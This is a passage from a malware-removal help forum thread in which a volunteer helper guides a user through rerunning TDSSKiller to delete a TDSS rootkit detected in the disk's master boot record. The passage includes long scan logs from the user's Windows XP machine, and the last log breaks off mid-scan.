20:18:14.0109 0x0ae0  [ 35321FB577CDC98CE3EB3A3EB9E4610A, C9A6F5CF282D8FCB3CDFCC4B306013480E78E1B664E1A60A4E27B161F9FFD4CD ] wuauserv        C:\WINDOWS\system32\wuauserv.dll
20:18:14.0296 0x0ae0  wuauserv - ok
20:18:14.0343 0x0ae0  [ F15FEAFFFBB3644CCC80C5DA584E6311, 79B3E9AF35976CE49921E9BEA3BA3B4A8AF762FD3F284B62954038B5FFB32471 ] WudfPf          C:\WINDOWS\system32\DRIVERS\WudfPf.sys
20:18:14.0406 0x0ae0  WudfPf - ok
20:18:14.0421 0x0ae0  [ 28B524262BCE6DE1F7EF9F510BA3985B, AEFF02B899801A63CBB262757C3D4369E38BFF0690BD085DE60E873DFBE3C3F4 ] WudfRd          C:\WINDOWS\system32\DRIVERS\wudfrd.sys
20:18:14.0453 0x0ae0  WudfRd - ok
20:18:14.0468 0x0ae0  [ 05231C04253C5BC30B26CBAAE680ED89, 5C03C2D7E0B573646D32F4093E2FF2C3BA391C39F5BA37D67F69D38E357FCC3D ] WudfSvc         C:\WINDOWS\System32\WUDFSvc.dll
20:18:14.0500 0x0ae0  WudfSvc - ok
20:18:14.0562 0x0ae0  [ 81DC3F549F44B1C1FFF022DEC9ECF30B, 3D14BFEA539F9CEB16555BD56C5E3C7C8F6692FC62C2789F8AAEA1C042E63940 ] WZCSVC          C:\WINDOWS\System32\wzcsvc.dll
20:18:14.0734 0x0ae0  WZCSVC - ok
20:18:14.0765 0x0ae0  [ 295D21F14C335B53CB8154E5B1F892B9, 9418477C2E3EA93E93D931A4EDD4500DA568FAD6040204B5201D1080203B0BBC ] xmlprov         C:\WINDOWS\System32\xmlprov.dll
20:18:14.0906 0x0ae0  xmlprov - ok
20:18:14.0937 0x0ae0  [ 518C4D4DCB93C88316303694163BBD63, 93865CC9AEFEF2DD0E8025EE283AC57773EF13D38E03B73FBCE22FAB9D77D2AE ] yukonwxp        C:\WINDOWS\system32\DRIVERS\yk51x86.sys
20:18:14.0984 0x0ae0  yukonwxp - ok
20:18:15.0031 0x0ae0  [ 478B4415DFB3A45B6FE61EC781E07D7B, C48BFA226F594E4BFB722056C8EF9CCBB27504F181781284AE7151D2CDAF50DE ] ZD1211BU(ZyDAS) C:\WINDOWS\system32\DRIVERS\zd1211Bu.sys
20:18:15.0093 0x0ae0  ZD1211BU(ZyDAS) - ok
20:18:15.0125 0x0ae0  [ 3C185892DD5C13975966E8D1C2A65290, 665A4B5AC61A76A6E72B6C87ECE902617E8A03DD1E63418CF15EA988FDBD5B44 ] ZD1211U(ZyDAS)  C:\WINDOWS\system32\DRIVERS\zd1211u.sys
20:18:15.0171 0x0ae0  ZD1211U(ZyDAS) - ok
20:18:15.0187 0x0ae0  [ 00AE175B903D45ED4A62384D3315DC2A, FAAAD00B96DDCDEB396D479F89207A0EEC374871C6340AACDDB95BF289D6330C ] ZDPSp50         C:\WINDOWS\system32\Drivers\ZDPSp50.sys
20:18:15.0203 0x0ae0  ZDPSp50 - detected UnsignedFile.Multi.Generic ( 1 )
20:18:17.0734 0x0ae0  Detect skipped due to KSN trusted
20:18:17.0734 0x0ae0  ZDPSp50 - ok
20:18:17.0734 0x0ae0  ================ Scan global ===============================
20:18:17.0765 0x0ae0  [ 42F1F4C0AFB08410E5F02D4B13EBB623, 924C30587C51C0D1E1F47991969AF492A644552E15F2480EA991DCB74A3E68D5 ] C:\WINDOWS\system32\basesrv.dll
20:18:17.0812 0x0ae0  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
20:18:17.0843 0x0ae0  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
20:18:17.0875 0x0ae0  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] C:\WINDOWS\system32\services.exe
20:18:17.0875 0x0ae0  [ Global ] - ok
20:18:17.0875 0x0ae0  ================ Scan MBR ==================================
20:18:17.0890 0x0ae0  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
20:18:20.0812 0x0ae0  \Device\Harddisk0\DR0 - detected TDSS File System ( 1 )
20:18:20.0812 0x0ae0  \Device\Harddisk0\DR0 ( TDSS File System ) - warning
20:18:23.0453 0x0ae0  ================ Scan VBR ==================================
20:18:23.0468 0x0ae0  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
20:18:23.0484 0x0ae0  \Device\Harddisk0\DR0\Partition1 - ok
20:18:23.0484 0x0ae0  [ 401421E6791BC0E8EC72D2953AB78FCC ] \Device\Harddisk0\DR0\Partition2
20:18:23.0500 0x0ae0  \Device\Harddisk0\DR0\Partition2 - ok
20:18:23.0500 0x0ae0  ================ Scan generic autorun ======================
20:18:23.0500 0x0ae0  LaunchApp - ok
20:18:24.0203 0x0ae0  [ 1674E54E4AB3D492C648AA43F731A540, D140986EB98342D75E693F0D05ADAB672DF9553593A97B9455C6407142672B41 ] C:\WINDOWS\RTHDCPL.EXE
20:18:27.0171 0x0ae0  RTHDCPL - ok
20:18:27.0359 0x0ae0  [ C74B86642F131D76C0EDE673FDF137B2, 91659969CF94979FA980A3C13AB3E7421048E4E2720DE6064E9B61FD4DF96666 ] C:\WINDOWS\SkyTel.EXE
20:18:27.0562 0x0ae0  SkyTel - ok
20:18:27.0625 0x0ae0  [ 27ECDC43B2E41A865092CC31263358F2, 3956B6E4EC45C37D47E9FF7382984B806691B9407E59A6377C51B05E5A6BE83D ] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe
20:18:27.0640 0x0ae0  ntiMUI - detected UnsignedFile.Multi.Generic ( 1 )
20:18:30.0593 0x0ae0  Detect skipped due to KSN trusted
20:18:30.0593 0x0ae0  ntiMUI - ok
20:18:30.0625 0x0ae0  [ 8FB740D758B14B1BC950CC347C21E461, 6EAB429DE35D87C94E9B912E189C248428653674939352E0210FC026F5A4B564 ] C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
20:18:30.0640 0x0ae0  RemoteControl - detected UnsignedFile.Multi.Generic ( 1 )
20:18:33.0578 0x0ae0  Detect skipped due to KSN trusted
20:18:33.0578 0x0ae0  RemoteControl - ok
20:18:33.0609 0x0ae0  [ 7BBE4CF421AECC7F0226EDD75F12079F, 8E78FC5E0657DB066F9EBAADEA9AFECB1AAA570DD9C08C7ED42116704D2E379D ] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE
20:18:33.0781 0x0ae0  IMJPMIG8.1 - ok
20:18:33.0796 0x0ae0  [ E6BB63BBE1BED01769CA87F4DAC286C8, 6D1D7C7365FBF29C92398BC11D5713BC373E372D92C155DA0DBA3B86DD1705F7 ] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
20:18:33.0937 0x0ae0  IMEKRMIG6.1 - ok
20:18:33.0968 0x0ae0  [ 1B17E09C1223F6D17336D2DD7A1AF4F4, 06DFAD95007532CCF46D593EEDC2474936614AEDCEA7BF983E36DAD22F850B08 ] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe
20:18:34.0109 0x0ae0  MSPY2002 - ok
20:18:34.0140 0x0ae0  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
20:18:34.0296 0x0ae0  PHIME2002ASync - ok
20:18:34.0312 0x0ae0  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
20:18:34.0437 0x0ae0  PHIME2002A - ok
20:18:34.0468 0x0ae0  [ 3F5B5C05BA8002D171B482066CEDFE75, DDAC7B13387AC6729136315A30467FF6B3D94CF71CF91E7D53B70660028B0782 ] C:\WINDOWS\system32\igfxtray.exe
20:18:34.0515 0x0ae0  IgfxTray - ok
20:18:34.0546 0x0ae0  [ 71E7AC7708BDFF5FFA0FA33D38220195, F11CF440DFBC1573FA05959B3F727CE1AF721DC98333996BB777FC7CEB166FF9 ] C:\WINDOWS\system32\hkcmd.exe
20:18:34.0578 0x0ae0  HotKeysCmds - ok
20:18:34.0593 0x0ae0  [ 63678F54E6EFB60010C073E3979080E9, 7403D83F99F9F8F77BDF9FC925F48BCD407860BF11FED8872F9F9B42BB531B8C ] C:\WINDOWS\system32\igfxpers.exe
20:18:34.0625 0x0ae0  Persistence - ok
20:18:34.0671 0x0ae0  [ 72D78BD9AB1F457502F01832B07133CF, 28B63273420234F4349E23DCEDC5F80E9BAB307C08F39016E92DA7BCA411955E ] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
20:18:34.0703 0x0ae0  eDataSecurity Loader - detected UnsignedFile.Multi.Generic ( 1 )
20:18:37.0250 0x0ae0  Detect skipped due to KSN trusted
20:18:37.0250 0x0ae0  eDataSecurity Loader - ok
20:18:37.0328 0x0ae0  [ C67E00C1DCA52FB369DC54E9EE653D47, 5D6C19CFFCB221FEFA60870E1520DF035DD4433D0B5DEC505EBBC01D5EE6AD0D ] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
20:18:37.0359 0x0ae0  eRecoveryService - detected UnsignedFile.Multi.Generic ( 1 )
20:18:40.0250 0x0ae0  Detect skipped due to KSN trusted
20:18:40.0250 0x0ae0  eRecoveryService - ok
20:18:40.0328 0x0ae0  [ 2E73DF74A297EE6B91C4F57B9BD84317, 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29 ] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe
20:18:40.0328 0x0ae0  Suspicious file ( NoAccess ): C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe. md5: 2E73DF74A297EE6B91C4F57B9BD84317, sha256: 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29
20:18:40.0328 0x0ae0  QuickCare2.2 - detected LockedFile.Multi.Generic ( 1 )
20:18:42.0890 0x0ae0  Detect skipped due to KSN trusted
20:18:42.0890 0x0ae0  QuickCare2.2 - ok
20:18:42.0968 0x0ae0  [ D5E719C1ED306EC0E65E2E71638CC40A, 102AB96AD06F62BA110568F0E5179AB7D5D1B0AE4DA4A3549F64CFA9DE5FD2A4 ] C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe
20:18:42.0984 0x0ae0  AmazonGSDownloaderTray - detected UnsignedFile.Multi.Generic ( 1 )
20:18:45.0500 0x0ae0  Detect skipped due to KSN trusted
20:18:45.0500 0x0ae0  AmazonGSDownloaderTray - ok
20:18:45.0546 0x0ae0  [ D2DAD71C96C113ED07F7BB79AD831C28, 8EACE797C16663D58B8BA67C9BF135780D1676E16797A1E81706263238C7BC0B ] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe
20:18:45.0593 0x0ae0  APSDaemon - ok
20:18:45.0640 0x0ae0  [ 4AFFDCAADCB1DBBFFAF06C7F82E7F6FC, 8BAD14D327C60B4CBC00278802A5F6453D641EFC2EF97D90E7AB579758DF7FFC ] C:\Program Files\iTunes\iTunesHelper.exe
20:18:45.0671 0x0ae0  iTunesHelper - ok
20:18:45.0718 0x0ae0  [ 8DDA2B606279753601F9415DA503CA63, 2C9AD8218E150B6D50817991377ED3230A1672EFBD7AE29D0CD9E55E2418C800 ] C:\Program Files\QuickTime\QTTask.exe
20:18:45.0750 0x0ae0  QuickTime Task - detected UnsignedFile.Multi.Generic ( 1 )
20:18:48.0281 0x0ae0  Detect skipped due to KSN trusted
20:18:48.0281 0x0ae0  QuickTime Task - ok
20:18:48.0375 0x0ae0  [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
20:18:48.0437 0x0ae0  Adobe ARM - ok
20:18:48.0484 0x0ae0  [ D63797E8E7781EE1500A810CB6194FA6, 5C96DA00B98F0776E6174EBB7D4D6DB634838E130D8581E11811831D2C57B119 ] C:\Program Files\Common Files\Java\Java Update\jusched.exe
20:18:48.0500 0x0ae0  SunJavaUpdateSched - ok
20:18:48.0562 0x0ae0  [ CE5C9977DA751DDC30952AC4DCBCA788, 295172C4681E9AC27121122CDD2BA6F2A62435917A083CC8490D584CA0164BE6 ] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
20:18:48.0578 0x0ae0  HP Software Update - ok
20:18:48.0578 0x0ae0  Malwarebytes Anti-Malware (reboot) - ok
20:18:48.0812 0x0ae0  [ 6DB4CC46B84D49F675D89BFB0A8CAFC3, 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F ] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
20:18:48.0828 0x0ae0  Suspicious file ( NoAccess ): C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe. md5: 6DB4CC46B84D49F675D89BFB0A8CAFC3, sha256: 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F
20:18:48.0843 0x0ae0  SUPERAntiSpyware - detected LockedFile.Multi.Generic ( 1 )
20:18:51.0718 0x0ae0  Detect skipped due to KSN trusted
20:18:51.0718 0x0ae0  SUPERAntiSpyware - ok
20:18:51.0890 0x0ae0  [ 1018DE129F3A1D28654FD801D3FCA4E1, 78E913ACF8024F0B75CFF151162F83318BEDBBD43E390A32532E6EF94DA6C3AF ] C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
20:18:51.0968 0x0ae0  Spotify Web Helper - ok
20:18:52.0000 0x0ae0  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
20:18:52.0187 0x0ae0  ctfmon.exe - ok
20:18:52.0234 0x0ae0  swg - ok
20:18:52.0250 0x0ae0  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
20:18:52.0375 0x0ae0  ctfmon.exe - ok
20:18:52.0500 0x0ae0  [ 3E930C641079443D4DE036167A69CAA2, DEBA83978850F17B33A3C4C06C5E707B9A3FACA30FE0DFC5A9425EF2CA592473 ] C:\Program Files\Messenger\msmsgs.exe
20:18:52.0718 0x0ae0  MSMSGS - ok
20:18:52.0734 0x0ae0  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
20:18:52.0875 0x0ae0  ctfmon.exe - ok
20:18:52.0875 0x0ae0  swg - ok
20:18:52.0875 0x0ae0  Waiting for KSN requests completion. In queue: 10
20:18:53.0875 0x0ae0  Waiting for KSN requests completion. In queue: 5
20:18:54.0875 0x0ae0  Waiting for KSN requests completion. In queue: 5
20:18:56.0265 0x0ae0  Win FW state via NFM: disabled
20:18:58.0906 0x0ae0  ============================================================
20:18:58.0906 0x0ae0  Scan finished
20:18:58.0906 0x0ae0  ============================================================
20:18:58.0921 0x0928  Detected object count: 1
20:18:58.0921 0x0928  Actual detected object count: 1
20:19:50.0562 0x0928  \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:19:50.0562 0x0928  \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip
 

 

Thank you!!

 

 

RG

Attached Files



#12 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 10 September 2014 - 02:09 PM

Hi rockgremlin

Please rerun TDSSKiller and select Delete for the following:

20:19:50.0562 0x0928 \Device\Harddisk0\DR0 ( TDSS File System )

Rerun TDSSKiller yet another time and post the results.

Thanks

BBPP6nz.png


#13 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 22 September 2014 - 02:25 PM

OK, reran TDSKiller, and deleted that one remaining threat. The following is the scan results after running it one last time:

 

 

 

 

 

13:13:49.0812 0x0780  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
13:13:54.0406 0x0780  ============================================================
13:13:54.0406 0x0780  Current date / time: 2014/09/22 13:13:54.0406
13:13:54.0406 0x0780  SystemInfo:
13:13:54.0406 0x0780  
13:13:54.0406 0x0780  OS Version: 5.1.2600 ServicePack: 3.0
13:13:54.0406 0x0780  Product type: Workstation
13:13:54.0406 0x0780  ComputerName: MOLES
13:13:54.0406 0x0780  UserName: Jay
13:13:54.0406 0x0780  Windows directory: C:\WINDOWS
13:13:54.0406 0x0780  System windows directory: C:\WINDOWS
13:13:54.0406 0x0780  Processor architecture: Intel x86
13:13:54.0406 0x0780  Number of processors: 2
13:13:54.0406 0x0780  Page size: 0x1000
13:13:54.0406 0x0780  Boot type: Normal boot
13:13:54.0406 0x0780  ============================================================
13:13:56.0734 0x0780  KLMD registered as C:\WINDOWS\system32\drivers\45884922.sys
13:13:56.0906 0x0780  System UUID: {10646453-9EAF-5A04-17E5-37A5C35426A9}
13:13:57.0796 0x0780  Drive \Device\Harddisk0\DR0 - Size: 0x2658AE0000 ( 153.39 Gb ), SectorSize: 0x200, Cylinders: 0x4E37, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054
13:13:57.0812 0x0780  ============================================================
13:13:57.0812 0x0780  \Device\Harddisk0\DR0:
13:13:57.0828 0x0780  MBR partitions:
13:13:57.0828 0x0780  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x9C263D, BlocksNum 0x8FADA22
13:13:57.0828 0x0780  \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x997005F, BlocksNum 0x90A8A62
13:13:57.0828 0x0780  ============================================================
13:13:57.0890 0x0780  C: <-> \Device\Harddisk0\DR0\Partition1
13:13:57.0890 0x0780  D: <-> \Device\Harddisk0\DR0\Partition2
13:13:57.0890 0x0780  ============================================================
13:13:57.0890 0x0780  Initialize success
13:13:57.0890 0x0780  ============================================================
13:15:40.0187 0x08d8  ============================================================
13:15:40.0187 0x08d8  Scan started
13:15:40.0187 0x08d8  Mode: Manual; SigCheck; TDLFS;
13:15:40.0187 0x08d8  ============================================================
13:15:40.0187 0x08d8  KSN ping started
13:15:42.0796 0x08d8  KSN ping finished: true
13:15:43.0984 0x08d8  ================ Scan system memory ========================
13:15:44.0000 0x08d8  System memory - ok
13:15:44.0000 0x08d8  ================ Scan services =============================
13:15:44.0078 0x08d8  [ C0393EB99A6C72C6BEF9BFC4A72B33A6, 72BF029C6A37DE131FFD61C2374C8920556236218613E37B5F348AA89FA12E42 ] !SASCORE        C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
13:15:44.0875 0x08d8  !SASCORE - detected UnsignedFile.Multi.Generic ( 1 )
13:15:47.0703 0x08d8  Detect skipped due to KSN trusted
13:15:47.0703 0x08d8  !SASCORE - ok
13:15:47.0828 0x08d8  Abiosdsk - ok
13:15:47.0843 0x08d8  abp480n5 - ok
13:15:47.0875 0x08d8  [ 8FD99680A539792A30E97944FDAECF17, 594F8E0C3695400B0C09A797AF6BDFAC6F750ECD67D0EE803914C572B1DCC43C ] ACPI            C:\WINDOWS\system32\DRIVERS\ACPI.sys
13:15:49.0625 0x08d8  ACPI - ok
13:15:49.0656 0x08d8  [ 9859C0F6936E723E4892D7141B1327D5, 5E8F6A2FC4DF2E5E92A1D66ECC2810E08B42B64E9CD0DF4AD3F78EA8558B90AF ] ACPIEC          C:\WINDOWS\system32\drivers\ACPIEC.sys
13:15:49.0859 0x08d8  ACPIEC - ok
13:15:49.0937 0x08d8  [ FBB312C9DA3863673EC18F4AE4101778, 4E9AAE7C700E485C17FDFCC9100A79784673B006D00D4D4CE8F1DB617D25C864 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:15:49.0968 0x08d8  AdobeFlashPlayerUpdateSvc - ok
13:15:49.0968 0x08d8  adpu160m - ok
13:15:50.0015 0x08d8  [ 8BED39E3C35D6A489438B8141717A557, 1B5796E56B0927360CE0759641B1151828BC0A9E45620D2B2D880491F5CE33D0 ] aec             C:\WINDOWS\system32\drivers\aec.sys
13:15:50.0203 0x08d8  aec - ok
13:15:50.0234 0x08d8  [ 1E44BC1E83D8FD2305F8D452DB109CF9, CF5EC07E0B589FA2A4701C6CFD69E893FC3ABF274AD57AE3C13FFE49063B02C8 ] AFD             C:\WINDOWS\System32\drivers\afd.sys
13:15:50.0296 0x08d8  AFD - ok
13:15:50.0312 0x08d8  Aha154x - ok
13:15:50.0312 0x08d8  aic78u2 - ok
13:15:50.0328 0x08d8  aic78xx - ok
13:15:50.0359 0x08d8  [ A9A3DAA780CA6C9671A19D52456705B4, 67C959144B57AE0BBF1D82DBED197F32CDB06FECD883A80C441A0202FE83FAB4 ] Alerter         C:\WINDOWS\system32\alrsvc.dll
13:15:50.0531 0x08d8  Alerter - ok
13:15:50.0562 0x08d8  [ 8C515081584A38AA007909CD02020B3D, A5E13CA10F702928E0DE84C74D0EA8ACCB117FD76FBABC55220C75C4FFD596DC ] ALG             C:\WINDOWS\System32\alg.exe
13:15:50.0718 0x08d8  ALG - ok
13:15:50.0734 0x08d8  AliIde - ok
13:15:50.0734 0x08d8  amsint - ok
13:15:50.0828 0x08d8  [ A5299D04ED225D64CF07A568A3E1BF8C, 6F7E73893127BADC8C9815E9BCC0EB5F6584E254D0D09A0B6A680704C71E0A90 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:15:50.0843 0x08d8  Apple Mobile Device - ok
13:15:50.0890 0x08d8  [ D8849F77C0B66226335A59D26CB4EDC6, 4990031453204C57E36E850252A39B05D6ECDAB9E71A8136FB4900F17E59C9CA ] AppMgmt         C:\WINDOWS\System32\appmgmts.dll
13:15:51.0046 0x08d8  AppMgmt - ok
13:15:51.0093 0x08d8  [ B5B8A80875C1DEDEDA8B02765642C32F, AD0C71D73B1B8225351FBF4FFB43001A32B4DAE69504C59970CD2428BB33D4EF ] Arp1394         C:\WINDOWS\system32\DRIVERS\arp1394.sys
13:15:51.0250 0x08d8  Arp1394 - ok
13:15:51.0265 0x08d8  asc - ok
13:15:51.0281 0x08d8  asc3350p - ok
13:15:51.0281 0x08d8  asc3550 - ok
13:15:51.0359 0x08d8  [ 0E5E4957549056E2BF2C49F4F6B601AD, F7F19FDC906B719A3516D30A9B4A2262C8CC5B36B94E3D4195C345EC4610FF2B ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
13:15:51.0390 0x08d8  aspnet_state - ok
13:15:51.0406 0x08d8  [ B153AFFAC761E7F5FCFA822B9C4E97BC, 7E60F572A6B3C6219E3C86225AA37243AFFD74337DB7F108B04778042E5CC959 ] AsyncMac        C:\WINDOWS\system32\DRIVERS\asyncmac.sys
13:15:51.0578 0x08d8  AsyncMac - ok
13:15:51.0625 0x08d8  [ 9F3A2F5AA6875C72BF062C712CFA2674, B4DF1D2C56A593C6B54DE57395E3B51D288F547842893B32B0F59228A0CF70B9 ] atapi           C:\WINDOWS\system32\DRIVERS\atapi.sys
13:15:51.0765 0x08d8  atapi - ok
13:15:51.0781 0x08d8  Atdisk - ok
13:15:51.0812 0x08d8  [ 9916C1225104BA14794209CFA8012159, 5D6F05F715C52A16D05CAE15C3DFE77A139A7F27F7AE710EC9A10F9EE05115A1 ] Atmarpc         C:\WINDOWS\system32\DRIVERS\atmarpc.sys
13:15:51.0984 0x08d8  Atmarpc - ok
13:15:52.0015 0x08d8  [ DEF7A7882BEC100FE0B2CE2549188F9D, 462C95B63D0A1058291A2DC8CBFCB13D7D74CCD1CA43B613A7EB43D49E3276F8 ] AudioSrv        C:\WINDOWS\System32\audiosrv.dll
13:15:52.0171 0x08d8  AudioSrv - ok
13:15:52.0187 0x08d8  [ D9F724AA26C010A217C97606B160ED68, 329B5118F2409731D06FDAE85B6ADD64A048292801BCB3546651CEB303111695 ] audstub         C:\WINDOWS\system32\DRIVERS\audstub.sys
13:15:52.0343 0x08d8  audstub - ok
13:15:52.0421 0x08d8  [ A2494901E7226B356B8C1005C45F1C5F, A4A7076D40B012BB415C4B661B8C45671B853330746E278D080EC96596EEECBE ] BBSvc           C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.exe
13:15:52.0453 0x08d8  BBSvc - ok
13:15:52.0484 0x08d8  [ 63B1CBBAE4790B5BAC98F01BF9449722, 0A49B9FCEF33B38132B0AB8A9D7591A46856E82BC2123841E27A895817D92695 ] BBUpdate        C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.exe
13:15:52.0500 0x08d8  BBUpdate - ok
13:15:52.0531 0x08d8  [ DA1F27D85E0D1525F6621372E7B685E9, 5A81A46A3BDD19DAFC6C87D277267A5D44F3A1B5302F2CC1111D84B7BAD5610D ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
13:15:52.0703 0x08d8  Beep - ok
13:15:52.0734 0x08d8  [ 574738F61FCA2935F5265DC4E5691314, 3C7CCF064397186C3A3863DD2370AB6414A61B330097DCA4F299CA7BBAA3D1B4 ] BITS            C:\WINDOWS\system32\qmgr.dll
13:15:52.0968 0x08d8  BITS - ok
13:15:53.0046 0x08d8  [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A, 10F21999FF6B1D410EBF280F7F27DEACA5289739CF12F4293B614B8FC6C88DCC ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
13:15:53.0078 0x08d8  Bonjour Service - ok
13:15:53.0109 0x08d8  [ CFD4E51402DA9838B5A04AE680AF54A0, 5378F42B195B5832B00A05AD64E00473A45FFB86AC25C57241F26EA82B149FE1 ] Browser         C:\WINDOWS\System32\browser.dll
13:15:53.0171 0x08d8  Browser - ok
13:15:53.0218 0x08d8  [ 90A673FC8E12A79AFBED2576F6A7AAF9, BDE7858A3457DB979FEDD8577FA6321BF72848E4A7BF9F173C78A6A10CBB3EBE ] cbidf2k         C:\WINDOWS\system32\drivers\cbidf2k.sys
13:15:53.0406 0x08d8  cbidf2k - ok
13:15:53.0421 0x08d8  cd20xrnt - ok
13:15:53.0437 0x08d8  [ C1B486A7658353D33A10CC15211A873B, AA4DD9E7AAE5AAB1146B360B17001F975D2F29A1281CF7B13E7136480410F347 ] Cdaudio         C:\WINDOWS\system32\drivers\Cdaudio.sys
13:15:53.0593 0x08d8  Cdaudio - ok
13:15:53.0609 0x08d8  [ C885B02847F5D2FD45A24E219ED93B32, B26B2F8E3A831E2B65EB0C5195B0645CD50E22615CE79C9B0B391CD563B121DB ] Cdfs            C:\WINDOWS\system32\drivers\Cdfs.sys
13:15:53.0765 0x08d8  Cdfs - ok
13:15:53.0781 0x08d8  [ 1F4260CC5B42272D71F79E570A27A4FE, B51C2A3ED3C309953D0EA45869C8E464C10F2533DADE9E0286AF674979098D1D ] Cdrom           C:\WINDOWS\system32\DRIVERS\cdrom.sys
13:15:53.0937 0x08d8  Cdrom - ok
13:15:53.0968 0x08d8  [ 1CFE720EB8D93A7158A4EBC3AB178BDE, 65D2A9D9A88F38D4AF323134C151BA0F4B3CD0F6A134AF86E7AC9D07319F1726 ] CiSvc           C:\WINDOWS\system32\cisvc.exe
13:15:54.0125 0x08d8  CiSvc - ok
13:15:54.0140 0x08d8  [ 34CBE729F38138217F9C80212A2A0C82, A9FD7A758D12E0818A11BEEF1CE772FEFA8373E92EF6C0DA8628CD4572CC9A43 ] ClipSrv         C:\WINDOWS\system32\clipsrv.exe
13:15:54.0296 0x08d8  ClipSrv - ok
13:15:54.0328 0x08d8  [ D87ACAED61E417BBA546CED5E7E36D9C, 14AC6034A5BC0FB2A1AFDAD42BEF4DE641556E54AD30D0C46765660A4BE55462 ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:15:54.0343 0x08d8  clr_optimization_v2.0.50727_32 - ok
13:15:54.0406 0x08d8  [ C5A75EB48E2344ABDC162BDA79E16841, 6070A8AAFD38FBC6A68A2B10C20117612354DF21B4492D90CA522BFB6870D726 ] clr_optimization_v4.0.30319_32 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:15:54.0421 0x08d8  clr_optimization_v4.0.30319_32 - ok
13:15:54.0437 0x08d8  CmdIde - ok
13:15:54.0453 0x08d8  COMSysApp - ok
13:15:54.0468 0x08d8  Cpqarray - ok
13:15:54.0500 0x08d8  [ 3D4E199942E29207970E04315D02AD3B, 0825960894CF9C86CC8775BDD2A262948A09CA495AA7FE9F210FAF49E7086383 ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll
13:15:54.0656 0x08d8  CryptSvc - ok
13:15:54.0671 0x08d8  dac2w2k - ok
13:15:54.0671 0x08d8  dac960nt - ok
